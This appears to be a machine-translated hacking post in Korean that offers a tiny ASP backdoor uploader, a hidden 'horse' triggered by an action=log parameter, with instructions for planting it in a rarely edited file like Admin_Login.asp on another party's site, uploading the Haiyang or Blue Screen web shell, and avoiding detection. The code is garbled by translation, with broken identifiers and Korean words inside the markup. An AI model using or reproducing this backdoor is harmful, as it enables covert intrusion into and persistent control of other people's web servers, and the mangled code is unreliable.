request.querystring ( "action") = "log"인 경우 <%
a = request.TotalBytes : A가 a a a a a a a a a a a a a a a a a adodb.stream ": set c = createobject (b) : c.type = 1 : c.open : c.write request.binaryread (a) : c.position = 0 : d = c.read : e = chrb (13) & chrb (10) : f = instrb (d, e) : G = instb (f+1, d, e) : e h = createobject (b) : h.type = 1 : h.open : c.position = f+1 : c.copyto h, gf-3 : h.position = 0 : h.type = 2 : h.charset = "big5": i = h.readtext : h.close : j = mid (i, instrev (i, "/")+1, g) : k = instrb (d, e & e) +4 : l = instrb (k+1, d, leftb (d, f-1)) -k-2 : h.type = 1 : h.open : c.position = k-1 : c.copyto h, l : h.savetofile server.mappath (j), 2%> <form encType = multipart/form-data method = post> <입력 유형 = 파일 이름 = n> <입력 유형 = 제출> </form>
<%종료 if%>
이유 : 파일을 업로드 할 수 있고 단순하고 크기가 작으며 발견하기 쉽지 않습니다.
사용 : 먼저 Haiyang 또는 Blue Screen을 사용하여 Horse를 Admin_Login.asp와 같이 업데이트하기 쉽지 않은 일부 파일로 편집하십시오. 다른 사람의 파일을 작동 할 때는 admin_login.asp? action = action = 브라우저에 로그인하여 Haiyang 또는 블루 스크린을 업로드하십시오. 작동 후 블루 스크린 및 기타 자기 삭제 기능을 사용하여 블루 스크린을 삭제하십시오. 나는이 방송국을 사용하여 Haiyang에 그것을 업로드 할 것입니다. 거의 조사하고 살해되지 않습니다.